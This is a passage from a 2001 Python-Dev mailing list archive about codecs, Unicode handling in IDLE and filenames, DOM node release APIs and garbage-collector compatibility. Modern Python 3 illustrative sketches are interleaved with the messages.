"...long data...".encode("gzip") -> string (transfer encoding)
"...gzipped data...".decode("gzip") -> string (transfer decoding)
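For comparison, today's Python 3 reserves `bytes.decode()` and `str.encode()` for text encodings. Everything else goes through `codecs.encode()` and `codecs.decode()`. The standard library ships bytes-to-bytes codecs such as `zlib_codec` and `base64_codec`, but it has no "gzip" or "jpeg" codec. The sketch below therefore uses zlib in place of gzip.

```python
import codecs

raw = "caf\u00e9".encode("latin-1")             # 8-bit data
text = codecs.decode(raw, "latin-1")            # bytes -> str (object construction)
recoded = text.encode("utf-8")                  # str -> bytes (recoding data)

payload = b"...long data..." * 100
packed = codecs.encode(payload, "zlib_codec")   # bytes -> bytes (transfer encoding)
unpacked = codecs.decode(packed, "zlib_codec")  # bytes -> bytes (transfer decoding)

print(text, recoded, len(payload), len(packed), unpacked == payload)
```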

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal at lemburg.com  Sun May 13 19:20:01 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Sun, 13 May 2001 19:20:01 +0200
Subject: [Python-Dev] Re: Ill-defined encoding for CP875?
References: <LNBBLJKPBEHFEDALKOLCOELPKBAA.tim_one@email.msn.com>
Message-ID: <3AFEC241.62084286@lemburg.com>

Tim Peters wrote:
> 
> I have a way to make dict lookup a teensy bit cheaper(*) that significantly
> reduces the number of collisions (which is much more valuable).
> 
> This caused a number of std tests to fail, because they were implicitly
> relying on the order in which a dict's entries are materialized via .keys()
> or .items().
> 
> Most of these were easy enough to fix.  The last failure remaining is
> test_unicode, and I don't know how to fix it.  It's dying here:
> 
>     try:
>         verify(unicode(s,encoding).encode(encoding) == s)
>     except TestFailed:
>         print '*** codec "%s" failed round-trip' % encoding
>     except ValueError,why:
>         print '*** codec for "%s" failed: %s' % (encoding, why)
> 
> when encoding == "cp875".  There's a bogus problem you have to worm around
> first:  test_unicode neglected to import TestFailed, so it actually dies
> with NameError while trying the "except TestFailed" clause after verify()
> raises TestFailed.  Once that's repaired, it's complaining about failing the
> round-trip encoding.

Ooops; this must have been caused by the assert statement
removal in the test suite I hacked up some months ago. Funny that
it never showed up... the code seems to be very robust ;-)
 
> The original character in s it's griping about is "?" (0x3f).  cp875.py has
> this entry in its decoding_map dict:
> 
>         0x003f: 0x001a, # SUBSTITUTE
> 
> But 0x1a is not a *unique* value in this dict.  There's also
> 
>         0x00dc: 0x001a, # SUBSTITUTE
>         0x00e1: 0x001a, # SUBSTITUTE
>         0x00ec: 0x001a, # SUBSTITUTE
>         0x00ed: 0x001a, # SUBSTITUTE
>         0x00fc: 0x001a, # SUBSTITUTE
>         0x00fd: 0x001a, # SUBSTITUTE
> 
> Therefore what appears associated with 0x1a in the derived encoding_map
> dict:
> 
> encoding_map = {}
> for k,v in decoding_map.items():
>     encoding_map[v] = k
> 
> may end up being any of the 7 decoding_map keys that map to 0x1a.  It just
> so happened to map back to 0x3f before, but to 0xfd after the dict change,
> so "?" doesn't survive the round trip anymore.

The "right" thing to do here, is to simply remove cp875
from the test for round-tripping. It is not the only encoding
which fails this test, but it's not our fault: the codecs were
all generated from the original codec maps at the Unicode.org site.

If their mappings are broken, we can't do much about it... other
than to ignore the error or remove the codec altogether.

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal at lemburg.com  Sun May 13 19:40:58 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Sun, 13 May 2001 19:40:58 +0200
Subject: [Python-Dev] IDLE and non-ASCII characters
References: <200105112053.WAA15657@pandora.informatik.hu-berlin.de>
Message-ID: <3AFEC72A.33076220@lemburg.com>

Martin von Loewis wrote:
> 
> Thanks to a bug report I got, I noticed for the first time that you
> cannot enter non-ASCII characters in IDLE anymore. Eg. at the shell
> prompt, you may get
> 
> >>> s='??'
> UnicodeError: ASCII encoding error: ordinal not in range(128)
> 
> Likewise, when trying to save a file that has non-ASCII characters,
> you get a traceback.
> 
> Now, I think I understand all the causes of the problem (Tkinter
> returning Unicode objects, and so on). However, I'm curious whether
> anybody has proposals on how to deal with it.
> 
> For saving text files, if Python had an encoding directive, things
> might be easier :-) For the shell prompt, I've no idea how to solve
> this best.
> 
> So any suggestions are welcome.

I have a bug report assigned to myself which indicates similar
problems with _tkinter and Tk/Tcl. There were other problem
reports on the German Python mailing list going in the same
direction too.

The basic problem seems to be that Tk/Tcl applies too much
magic to the text widget contents in order to find out the
used encoding and this can easily cause the whole encoding
mechanism to fail.

A Tk/Tcl expert should really look into this and fix _tkinter.c
to aid Tk/Tcl in not mixing up the encodings (e.g. it would
probably be a good idea to recode Python 8bit-strings into
whatever encoding Tk/Tcl assumes as default).

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From Mike.Olson at fourthought.com  Sun May 13 20:15:46 2001
From: Mike.Olson at fourthought.com (Mike Olson)
Date: Sun, 13 May 2001 12:15:46 -0600
Subject: [Python-Dev] Re: [4suite] ReleaseNode interface in 4XSLT
References: <200105131208.f4DC82o11349@mira.informatik.hu-berlin.de>
Message-ID: <3AFECF52.FF7E9B26@FourThought.com>

"Martin v. Loewis" wrote:
> 
> 
> In PyXML, I currently use
> 
> # Define ReleaseNode in a DOM-independent way
> import xml.dom.ext
> import xml.dom.minidom
> def _releasenode(n):
>     if isinstance(n, xml.dom.minidom.Node):
>         n.unlink()
>     else:
>         xml.dom.ext.ReleaseNode(n)
> 
> try:
>     from Ft.Lib import pDomlette
>     def ReleaseNode(n):
>         if isinstance(n, pDomlette.Node):
>             pDomlette.ReleaseNode(n)
>         else:
>             _releasenode(n)
>     _XsltElementBase = pDomlette.Element
> except ImportError:
>     ReleaseNode = _releasenode
>     from minisupport import _XsltElementBase
> 
> This code knows how to release minidom, 4DOM, and pDomlette nodes, and
> supports installations without 4Suite (i.e. without pDomlette). I've
> put this into xslt/__init__.py, so that all callers of
> Ft.Lib.pDomlette.ReleaseNode now need to call xml.xslt.ReleaseNode.
> If desired, I could produce a patch against the public Ft CVS.

What if we put these on the implementation, or came up with a
standard interface on the node.  Then, every DOM imp that wants to be
compatible with xpath/xslt needs to support this interface?


node.ownerDocument.implementation.releaseNode(node)

or

node.py_unlink()


> 
> As a slightly independent question, such a function also ought to
> support DOM implementations not known to it; I'm thinking in
> particular of the Zope DOMs. I'd like to hear proposals on how such an
> interface should work; I see three options:

See above

> 
> a) it is an operation on the document node (or any node), as in minidom.
> b) it is an operation on the DOM implementation (almost as in 4Suite;
>    you'd need to navigate from the node to the implementation, then
>    you'd need a well-known operation on the implementation)
> c) the code assumes that no release activity is necessary for unknown
>    DOMs, effectively believing in reference counting, garbage collection,
>    acquisition, and other black art.

I like either a or b

Mike

> 
> Any comments appreciated, in particular
> 1. from the Ft maintainers on introducing xml.xslt.ReleaseNode, and
> 2. from authors of other DOMs on a general memory management API for
>    Python DOM.
> 
> Regards,
> Martin
> 
> _______________________________________________
> 4suite mailing list
> 4suite at lists.fourthought.com
> http://lists.fourthought.com/mailman/listinfo/4suite

-- 
Mike Olson				 Principal Consultant
mike.olson at fourthought.com               (303)583-9900 x 102
Fourthought, Inc.                         http://Fourthought.com 
Software-engineering, knowledge-management, XML, CORBA, Linux, Python


From tim.one at home.com  Sun May 13 20:31:42 2001
From: tim.one at home.com (Tim Peters)
Date: Sun, 13 May 2001 14:31:42 -0400
Subject: [Python-Dev] RE: Ill-defined encoding for CP875?
In-Reply-To: <3AFEC241.62084286@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEOMKBAA.tim.one@home.com>

[M.-A. Lemburg]
> ...
> The "right" thing to do here, is to simply remove cp875
> from the test for round-tripping.

I'm relieved you think so, since that's what I already did <wink>.

> It is not the only encoding which fails this test, but it's not
> our fault: the codecs were all generated from the original codec
> maps at the Unicode.org site.
>
> If their mappings are broken, we can't do much about it... other
> than to ignore the error or remove the codec altogether.

On general principle I don't like either of those -- "in the face of
ambiguity, refuse the temptation to guess".  It's at least surprising to see

>>> unicode("?", "cp875").encode("cp875")
'\xfd'
>>>

now, yes?  Would it be better if an ambiguous encoding raised an exception in
"strict" mode?  That is, a third choice is to alert users when they're
relying on a broken part of a mapping.
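Here is a Python 3 sketch of that third choice. It assumes a hypothetical `ambiguous=` switch rather than the real codec error handlers. In strict mode, the encoder refuses any character that more than one byte decodes to. Otherwise, it picks the smallest byte, so the choice is deterministic.

```python
def make_encoder(decoding_map):
    """Build an encoder from a charmap-style decoding map (byte -> code point)."""
    reverse = {}
    for byte, code_point in decoding_map.items():
        reverse.setdefault(code_point, []).append(byte)

    def encode(text, ambiguous="strict"):
        out = bytearray()
        for ch in text:
            candidates = reverse.get(ord(ch))
            if candidates is None:
                raise UnicodeError(f"character {ch!r} has no mapping")
            if len(candidates) > 1 and ambiguous == "strict":
                choices = ", ".join(hex(b) for b in sorted(candidates))
                raise UnicodeError(f"character {ch!r} maps back to {choices}")
            # Unambiguous, or caller accepted a guess: pick the smallest byte.
            out.append(min(candidates))
        return bytes(out)

    return encode


encode = make_encoder({0x3f: 0x1a, 0xfd: 0x1a, 0x40: 0x20})
print(encode(" "))                          # b'@'
print(encode("\x1a", ambiguous="lowest"))   # b'?'
```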


From martin at loewis.home.cs.tu-berlin.de  Sun May 13 21:08:47 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Sun, 13 May 2001 21:08:47 +0200
Subject: [Python-Dev] Re: [4suite] ReleaseNode interface in 4XSLT
In-Reply-To: <3AFECF52.FF7E9B26@FourThought.com> (message from Mike Olson on
	Sun, 13 May 2001 12:15:46 -0600)
References: <200105131208.f4DC82o11349@mira.informatik.hu-berlin.de> <3AFECF52.FF7E9B26@FourThought.com>
Message-ID: <200105131908.f4DJ8lh14249@mira.informatik.hu-berlin.de>

> What if we put these on the implementation, or came up with a
> standard interface on the node.  Then, every DOM imp that wants to be
> compatible with xpath/xslt needs to support this interface?
> 
> 
> node.ownerDocument.implementation.releaseNode(node)
> 
> or
> 
> node.py_unlink()

releaseNode sounds good to me; it is unlikely that W3C would give an
operation that name but a different meaning. Any objections?
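Here is a minimal Python 3 sketch of a dispatcher built on that convention. `releaseNode` on the implementation is the name proposed in this thread; it is not a W3C or minidom API. If it is absent, the dispatcher falls back to option (a), minidom's `unlink()`, and then to option (c), doing nothing.

```python
import xml.dom.minidom


def release_node(node):
    """Release a DOM node, trying each convention from the thread in turn.

    Returns the name of the strategy used (handy for logging and tests).
    """
    doc = getattr(node, "ownerDocument", None)
    if doc is None:           # a Document node has no ownerDocument
        doc = node
    impl = getattr(doc, "implementation", None)
    release = getattr(impl, "releaseNode", None)
    if callable(release):
        release(node)         # (b) well-known operation on the implementation
        return "implementation"
    unlink = getattr(node, "unlink", None)
    if callable(unlink):
        unlink()              # (a) operation on the node, as in minidom
        return "unlink"
    return "none"             # (c) trust refcounting/GC for unknown DOMs


doc = xml.dom.minidom.parseString("<root><child/></root>")
print(release_node(doc.documentElement))   # unlink
```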

Regards,
Martin


From tim.one at home.com  Sun May 13 21:45:40 2001
From: tim.one at home.com (Tim Peters)
Date: Sun, 13 May 2001 15:45:40 -0400
Subject: [Python-Dev] RE: [Patches] [ python-Patches-410465 ] Allow pre-encoded strings as filenames
In-Reply-To: <E14yqvu-0008Jb-00@usw-sf-web1.sourceforge.net>
Message-ID: <LNBBLJKPBEHFEDALKOLCIEPAKBAA.tim.one@home.com>

> http://sourceforge.net/tracker/?func=detail&atid=305470&aid=410465&
>    group_id=5470
>
> Category: core (C code)
> Group: None
> >Status: Closed
> >Resolution: Accepted
> Priority: 5
> Submitted By: Mark Hammond (mhammond)
> Assigned to: Mark Hammond (mhammond)
> Summary: Allow pre-encoded strings as filenames
>
> Initial Comment:
> This patch enables most filename parameters to use pre-
> encoded strings.  On Windows, the default of "mbcs" is
> used.  On all other platforms, the default filename
> encoding is the same as the general default encoding,
> which in reality means there is no functional change.
> However, other platforms can simply plugin their own
> encodings.
> ...

Mark (or anyone else who understands all this), were doc changes included?
Can someone please add a briefer user-oriented blurb to Misc/NEWS too?
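In current Python 3, the same idea survives as `os.fsencode()` and `os.fsdecode()`, together with the byte-string paths that the os functions accept. Since Python 3.6, the Windows filesystem encoding is UTF-8 rather than "mbcs" (PEP 529). Here is a small sketch; `create_and_list` is a hypothetical helper.

```python
import os
import tempfile


def create_and_list(directory, name):
    """Create `name` inside `directory` using byte-string paths and list it back."""
    dir_bytes = os.fsencode(directory)    # str -> bytes in the filesystem encoding
    name_bytes = os.fsencode(name)
    with open(os.path.join(dir_bytes, name_bytes), "wb") as f:
        f.write(b"payload")
    # A bytes path passed to os.listdir() yields bytes names, still encoded.
    return [os.fsdecode(entry) for entry in os.listdir(dir_bytes)]


with tempfile.TemporaryDirectory() as tmp:
    print(create_and_list(tmp, "example.txt"))   # ['example.txt']
```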


From tim.one at home.com  Sun May 13 22:54:50 2001
From: tim.one at home.com (Tim Peters)
Date: Sun, 13 May 2001 16:54:50 -0400
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
In-Reply-To: <004001c0d919$a62de7d0$e46940d5@hagrid>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEPDKBAA.tim.one@home.com>

[/F]
> as a footnote, SRE uses the same source code to generate
> both 8-bit and 16-bit versions of the match engine.  I see no
> reason why we cannot do the same for the string operations
> (PyString, PyUnicode, and strop).
>
> if anyone wants me to look into this, just say "go ahead".

go ahead

Here's another idea:  whenever we fix or extend Python's "%" formats, it
requires changes in both stringobject.c and unicodeobject.c, but they've
diverged in irritating ways that make it a fresh adventure in each.

In the early days, Python handled % formats pretty much by just building a
format string and passing that on to C's sprintf.

But as the years have gone by, and the number of buggy platforms increased,
Python has taken over more & more of it itself.  For example, it doesn't
trust sprintf to deal with justification, 0-fill or blank-fill, and needed to
grow its own from-scratch code for integer conversion in order to handle
Python longs.  In addition, it also grew a PyErr_Format() routine as yet
another layer of simulating what a safe sprintf-alike should do.  Even with
all that, we've still got platform bugs due to, e.g., platform %#x and %#o
conversion adding base markers when "they shouldn't" (according to C), or not
adding them when "they should" (according to Python).
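To make the %#x mismatch concrete: C's printf("%#x", 0) prints "0", because C adds the 0x marker only to nonzero values, while Python always adds it. Below is a minimal sketch in modern Python 3 of a from-scratch conversion that never calls the platform sprintf and handles arbitrarily large ints. The function name hex_alternate is hypothetical, and this is not CPython's actual implementation.

```python
def hex_alternate(n):
    """Python-style '%#x': sign first, then an unconditional '0x' marker.

    Works for ints of any size because it only uses integer division,
    never a fixed-width C conversion.
    """
    digits = "0123456789abcdef"
    sign = "-" if n < 0 else ""
    n = abs(n)
    if n == 0:
        body = "0"
    else:
        chunks = []
        while n:
            n, r = divmod(n, 16)
            chunks.append(digits[r])
        body = "".join(reversed(chunks))
    # Unlike C, the marker is added even when the value is zero.
    return sign + "0x" + body


for value in (0, 255, -255, 2**100):
    print(value, hex_alternate(value))
```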

All in all, the code would be simpler and quicker now if we left the platform
sprintf out of sprintf operations entirely <wink>.  The only thing we're not
simulating ourselves is float->string conversion.  Unfortunately, we can't do
that without also doing string->float, because platforms vary in the float
strings they can read back (e.g., if Python does float->string and produces
"Inf" for positive infinity, but uses strtod or atof to read floats back in,
it's a x-platform crapshoot whether "Inf" can be read back in).
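For comparison, modern CPython (3.1 and later, on most platforms) does its own correctly rounded float/string conversion instead of delegating to sprintf and strtod, and float() accepts the "inf" and "nan" spellings regardless of platform. This sketch only checks that Python's own float->string->float path round-trips; the helper name round_trips is hypothetical.

```python
import math


def round_trips(x):
    """Return True if repr() followed by float() gives back exactly x."""
    y = float(repr(x))
    if math.isnan(x):
        # NaN never compares equal to itself, so check the category instead.
        return math.isnan(y)
    return y == x


SAMPLES = [0.1, -0.0, 1e-310, 1.7976931348623157e308,
           float("inf"), float("-inf"), float("nan")]

for value in SAMPLES:
    print(repr(value), round_trips(value))
```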

but-in-favor-of-merging-the-code-even-without-that-ly y'rs  - tim


From tim.one at home.com  Sun May 13 23:00:32 2001
From: tim.one at home.com (Tim Peters)
Date: Sun, 13 May 2001 17:00:32 -0400
Subject: [Python-Dev] test___all__ failing on WIndows
In-Reply-To: <15098.42607.84670.323361@beluga.mojam.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCIEPDKBAA.tim.one@home.com>

[skip at pobox.com]
> I (thankfully) gave up even pretending to run Windows recently, so
> I can only make a suggestion for others who look into this problem.
> Try this:
> Change test___all__.check_all so that the except clause reads:
>
>     except ImportError, msg:
>
> then print out msg when an import fails.  You should get the actual
> module that failed to import.
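The suggestion above, written as a minimal sketch in modern Python 3 syntax (except ImportError as msg). The body of check_all here is a hypothetical reconstruction for illustration, not the actual test___all__ code: it reports which import failed and then verifies that every name listed in __all__ exists.

```python
import importlib


def check_all(modname):
    """Import modname and verify that every name in its __all__ is defined."""
    try:
        mod = importlib.import_module(modname)
    except ImportError as msg:
        # Print the real failure instead of swallowing it.
        print("%s: import failed: %s" % (modname, msg))
        return False
    missing = [name for name in getattr(mod, "__all__", [])
               if not hasattr(mod, name)]
    assert not missing, "%s.__all__ lists undefined names: %r" % (modname, missing)
    return True


check_all("json")
```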

Yes, that confirmed termios was the culprit.  Thanks!  Fixed by adding

import termios
del termios

in pty.py.  As the irritated comment before this new code says, this is
absurd.

since-you're-on-a-roll-how-about-fixing-test_urllib2-too<wink>-ly
    y'rs  - tim


From guido at digicool.com  Mon May 14 00:26:39 2001
From: guido at digicool.com (Guido van Rossum)
Date: Sun, 13 May 2001 17:26:39 -0500
Subject: [Python-Dev] GC and ExtensionClass
In-Reply-To: Your message of "Sun, 13 May 2001 00:32:10 +0200."
             <200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de> 
References: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de> <200105122108.QAA09951@cj20424-a.reston1.va.home.com>  
            <200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de> 
Message-ID: <200105132226.RAA21159@cj20424-a.reston1.va.home.com>

> > Now, if you are using the 1.4 version of ExtensionClasses you might
> > not have the tp_flags field either (I don't know, I can't easily
> > check) but the 1.5.2-compatible version of ExtensionClasses doesn't
> > even require recompilation to work with Python 2.1.
> 
> I'll attach a copy below of the struct as defined in
> pygtk-0.7.0-unstable-dont-use.tar.gz

Hmm...  I like that filename. :-)

> (0.6.6 does not use extension
> classes). As you can see, it does not provide tp_flags, but has a
> field of tp_xxx4 for it.

Sorry, that's what I meant.  This is guaranteed to be initialized to 0
(unless a module goes out of its way to put a value in it, in which
case they deserve what they get).

> That *should* work, except that it also has its 'methods' field where
> tp_traverse would go, and its class_flags field where tp_clear would
> go.
> 
> Now, you write
> 
> > ExtensionClasses (at least recent versions that worked with 1.5.2)
> > contain a copy of the type object up to and including the tp_flags
> > field, and the 2.1 code is careful not to use any newer fields
> > without first checking the corresponding flag bit.
> 
> In this generality, it is apparently not true: Modules/gcmodule.c has,
> in delete_garbage,
> 
> 			if ((clear = op->ob_type->tp_clear) != NULL) {
> ...
> 		traverse = PyObject_FROM_GC(gc)->ob_type->tp_traverse;
> 		(void) traverse(PyObject_FROM_GC(gc),
> 			       (visitproc)visit_decref,
> 			       NULL);
> 
> which does not check any flags. That still shouldn't cause any
> problems, since the Gtk objects should never end up in the GC lists -
> but maybe I'm missing something.

I agree with your analysis: op here is gotten from a PyGC_Head, so it
cannot be a PyExtensionClass instance, so Neil's code should be safe.
Objects never have a GC head unless they specifically request it;
PyExtensionClass certainly doesn't request a GC head.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido at digicool.com  Mon May 14 00:37:44 2001
From: guido at digicool.com (Guido van Rossum)
Date: Sun, 13 May 2001 17:37:44 -0500
Subject: [Python-Dev] Type/class
In-Reply-To: Your message of "Sat, 12 May 2001 16:53:26 -0400."
             <Pine.NXT.4.21.0105121640050.261-100000@localhost> 
References: <Pine.NXT.4.21.0105121640050.261-100000@localhost> 
Message-ID: <200105132237.RAA21223@cj20424-a.reston1.va.home.com>

>  As I said earlier: the only advantage would be if it could simplify 
> things "under the hood" (compared to metaclasses) but could still 
> provide the same Class semantics (with maybe a "proto" declaration
> sneaking its nose in under the tent.) 
>  But I have no immediate idea on how to do that, and it sounds like
> you're pretty far along into an implementation already. 

I don't know how to do it either, but I suspect it wouldn't be easy.

>  I guess my practical question, which I meant to ask before I got
> myself sidetracked into preaching prototypes is: How much of the
> existing plumbing (specifically the Don Beaudry hack) can I rely
> on in the future for the objective-C/python bridge ? 
>  With BOOST and Zope's extension classes relying on it, can I 
> assume that it's being extended rather than replaced ? 
> ( I guess I ought to take a look at the code! ) 

I'm currently not too concerned with backwards compatibility, and Jim
Fulton has proclaimed that he would prefer to get rid of
ExtensionClassess (since what I'm building goes way beyond them!), so
I'm not sure I can be motivated to support just for BOOST's sake.
There will be a replacement mechanism that will be at least as
powerful, and I'm sure that BOOST etc. can be rewritten to use the new
mechanism easily.  That's what we're planning for Zope.

> Guido: did you ever imagine back at that first workshop at NIST
> that you and Python would be where you are today ? 

No way!  I knew I was on to something, but I had no idea onto what...
I'll always hold on to the T-shirt you made.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido at digicool.com  Mon May 14 00:43:57 2001
From: guido at digicool.com (Guido van Rossum)
Date: Sun, 13 May 2001 17:43:57 -0500
Subject: [Python-Dev] status of pre?
In-Reply-To: Your message of "Sat, 12 May 2001 00:18:27 +0200."
             <00ca01c0da68$4fc66570$e46940d5@hagrid> 
References: <15100.4754.950053.844678@cj42289-a.reston1.va.home.com> <200105111847.NAA05835@cj20424-a.reston1.va.home.com>  
            <00ca01c0da68$4fc66570$e46940d5@hagrid> 
Message-ID: <200105132243.RAA21290@cj20424-a.reston1.va.home.com>

> 2.2 is to be released in october, right?  I'm sure I could shake
> out the remaining bugs in my "stackless SRE" patch until then...

Knowing you that means you'd start working on them late September. :-)

There's actually a possibility that if my types/classes stuff goes
well, Digital Creations will ask for a 2.2 release sooner (e.g. July).
This might have an experimental status, e.g. it might not be backwards
compatible, but it would be the version required by Zope 2.4.  On the
other hand, none of that may happen, or that release would be labeled
2.2b1 or something, or Zope 2.4 might come out after October.

What I'm trying to say is, please try to fix stackless SRE sooner
rather than later!

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido at digicool.com  Mon May 14 00:51:17 2001
From: guido at digicool.com (Guido van Rossum)
Date: Sun, 13 May 2001 17:51:17 -0500
Subject: [Python-Dev] IDLE and non-ASCII characters
In-Reply-To: Your message of "Fri, 11 May 2001 22:53:55 +0200."
             <200105112053.WAA15657@pandora.informatik.hu-berlin.de> 
References: <200105112053.WAA15657@pandora.informatik.hu-berlin.de> 
Message-ID: <200105132251.RAA21344@cj20424-a.reston1.va.home.com>

> Thanks to a bug report I got, I noticed for the first time that you
> cannot enter non-ASCII characters in IDLE anymore. Eg. at the shell
> prompt, you may get
> 
> >>> s='äö'
> UnicodeError: ASCII encoding error: ordinal not in range(128)

This doesn't bother me, because I don't know how to enter such
characters with my US keyboard anyway. :-) :-)

> Likewise, when trying to save a file that has non-ASCII characters,
> you get a traceback.

Yes, this has bitten me once.  It was very painful (I lost a few hours
worth of writing).

In other words, I agree it's a problem!

> Now, I think I understand all the causes of the problem (Tkinter
> returning Unicode objects, and so on). However, I'm curious whether
> anybody has proposals on how to deal with it.

Not me -- unfortunately, there are too many alternatives to IDLE to
be able to justify working on it much.

> For saving text files, if Python had an encoding directive, things
> might be easier :-) For the shell prompt, I've no idea how to solve
> this best.
> 
> So any suggestions are welcome.

Ditto.

Postscript: using cut and paste, I *can* enter "s='äö'" in IDLE at the
Python prompt, both on Linux and on Windows 98.  It prints as
'\xe4\xf6' on both systems.  What changed?

--Guido van Rossum (home page: http://www.python.org/~guido/)


From Mike.Olson at fourthought.com  Mon May 14 03:02:03 2001
From: Mike.Olson at fourthought.com (Mike Olson)
Date: Sun, 13 May 2001 19:02:03 -0600
Subject: [Python-Dev] Re: [4suite] ReleaseNode interface in 4XSLT
References: <200105131208.f4DC82o11349@mira.informatik.hu-berlin.de> <3AFECF52.FF7E9B26@FourThought.com> <200105131908.f4DJ8lh14249@mira.informatik.hu-berlin.de>
Message-ID: <3AFF2E8B.31B9ED97@FourThought.com>

"Martin v. Loewis" wrote:
> 
> > What if we put these on the implementation, that or came up with a
> > standard interface on the node.  Then, every DOM imp that wants to be
> > compatible with xpath/xslt needs to support this interface?
> >
> >
> > node.ownerDocument.implementation.releaseNode(node)
> >
> > or
> >
> > node.py_unlink()
> 
> releaseNode sounds good to me; it is unlikely that W3C would give an
> operation that name but a different meaning. Any objections?


Should we standardize all of the python xml extensions with a py
prefix?  pyReleaseNode or py_releaseNode?  Then we will never have to
worry about a name clash.

Mike
> 
> Regards,
> Martin

-- 
Mike Olson				 Principal Consultant
mike.olson at fourthought.com               (303)583-9900 x 102
Fourthought, Inc.                         http://Fourthought.com 
Software-engineering, knowledge-management, XML, CORBA, Linux, Python


From MarkH at ActiveState.com  Mon May 14 03:37:35 2001
From: MarkH at ActiveState.com (Mark Hammond)
Date: Mon, 14 May 2001 11:37:35 +1000
Subject: [Python-Dev] RE: [Patches] [ python-Patches-410465 ] Allow pre-encoded strings as filenames
In-Reply-To: <LNBBLJKPBEHFEDALKOLCIEPAKBAA.tim.one@home.com>
Message-ID: <LCEPIIGDJPKCOIHOBJEPIEKLDMAA.MarkH@ActiveState.com>

[Tim]
> Mark (or anyone else who understands all this), were doc changes included?
> Can someone please add a briefer user-oriented blurb to Misc/NEWS too?

No problem.

Where should the "real" documentation go?  It seems maybe we need a new
sub-heading under the "6.1 - os -- Misc. OS Interface" - something like:

6.1.x - Unicode and the file system
  - general discussion.
  - Windows specific
  - Mac specific should that appear.
  - OS' with no special support (ie, "the rest")

Does that make sense?

I have made this change to Misc/NEWS.  Does this look OK (obviously once I
know what to replace "[????]" with :)

And-I-will-do-the-registry-docs-at-the-same-time ly,

Mark.

Index: NEWS
===================================================================
RCS file: /cvsroot/python/python/dist/src/Misc/NEWS,v
retrieving revision 1.166
diff -r1.166 NEWS
4a5,21
> - Some operating systems now support the concept of a default Unicode
>   encoding for file system operations.  Notably, Windows supports 'mbcs'
>   as the default.  The Macintosh will also adopt this concept in the medium
>   term, although the default encoding for that platform will be other than
>   'mbcs'.
>   On operating systems that support non-ASCII filenames, it is common for
>   functions that return filenames (such as os.listdir()) to return Python
>   string objects pre-encoded using the default file system encoding for
>   the platform.  As this encoding is likely to be different from Python's
>   default encoding, converting this name to a Unicode object before passing
>   it back to the operating system would result in a Unicode error, as Python
>   would attempt to use its default encoding (generally ASCII) rather
>   than the default encoding for the file system.
>   In general, this change simply removes surprises when working with
>   Unicode and the file system, making these operations work as
>   you expect, increasing the transparency of Unicode objects in this context.
>   See [????] for more details, including examples.
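The concept in this NEWS item later surfaced as public API: sys.getfilesystemencoding() (added in 2.3) and os.fsencode()/os.fsdecode() (added in 3.2). The sketch below uses those later functions to illustrate the idea; it is not the interface this patch adds. Note that modern Windows builds use 'utf-8' rather than 'mbcs' by default.

```python
import os
import sys

# The platform's file system encoding, e.g. 'utf-8' on most current systems.
fs_encoding = sys.getfilesystemencoding()

name = "caf\u00e9.txt"
encoded = os.fsencode(name)   # str -> bytes, using the file system encoding
decoded = os.fsdecode(encoded)  # bytes -> str, same encoding, so no surprise

print(fs_encoding, encoded, decoded)
```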


From tim.one at home.com  Mon May 14 04:52:22 2001
From: tim.one at home.com (Tim Peters)
Date: Sun, 13 May 2001 22:52:22 -0400
Subject: [Python-Dev] RE: [Patches] [ python-Patches-410465 ] Allow pre-encoded strings as filenames
In-Reply-To: <LCEPIIGDJPKCOIHOBJEPIEKLDMAA.MarkH@ActiveState.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEPOKBAA.tim.one@home.com>

[Mark Hammond]
> ...
> Where should the "real" documentation go?  It seems maybe we need a
> new sub-heading under the "6.1 - os -- Misc. OS Interface" - something
> like:
>
> 6.1.x - Unicode and the file system
>   - general discussion.
>   - Windows specific
>   - Mac specific should that appear.
>   - OS' with no special support (ie, "the rest")
>
> Does that make sense?

So far as it goes, yes.  I think the manual desperately needs a Unicode
section for other reasons, though:  from traffic on c.l.py, it's clear that
few people can figure out how to do *anything* with Unicode now unless their
first name begins with "M" (Mark, Martin, Marc -- definitely not Skip
<wink>).  There's no overview and there are no examples.  The primary string
method doesn't even mention Unicode (here paraphrasing questions that pop
up):

    encode([encoding[,errors]])
    Return an encoded version of the string.

What does "encoded version" mean?  Is that another string?  An encoding
object of some sort?  Etc.

    Default encoding is the current default string encoding.

What's the "current default string encoding"?  How can I find out?  Can't
even guess what *type* it has (string? magic object? little integer?).  If I
don't want the default encoding, how do I specify a different one?  What are
the possible values?  Again, can't even guess the type of the object that
needs to be passed for encoding.

    errors may be given to set a different error handling scheme.
    The default for errors is 'strict', meaning that encoding
    errors raise a ValueError. Other possible values are 'ignore'
    and 'replace'.

So what do 'ignore' and 'replace' mean?

There's more left unsaid here than a single example could clarify, but
there's not even an example -- so people stare at this wholly
uncomprehending.
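The kind of example Tim is asking for, as a minimal sketch in modern Python 3 (str.encode; the 2.x methods accepted the same error-handler names). It shows that the "current default string encoding" is just a string naming a codec, that encoding returns a byte string, and what 'strict', 'ignore' and 'replace' do. The helper name encode_all_ways is hypothetical.

```python
import sys

# The default encoding is simply a codec name, e.g. 'utf-8' in Python 3.
default_encoding = sys.getdefaultencoding()


def encode_all_ways(text, encoding="ascii"):
    """Encode text with each standard error handler and collect the results."""
    results = {}
    for errors in ("strict", "ignore", "replace"):
        try:
            # 'ignore' drops unencodable characters; 'replace' substitutes '?'.
            results[errors] = text.encode(encoding, errors)
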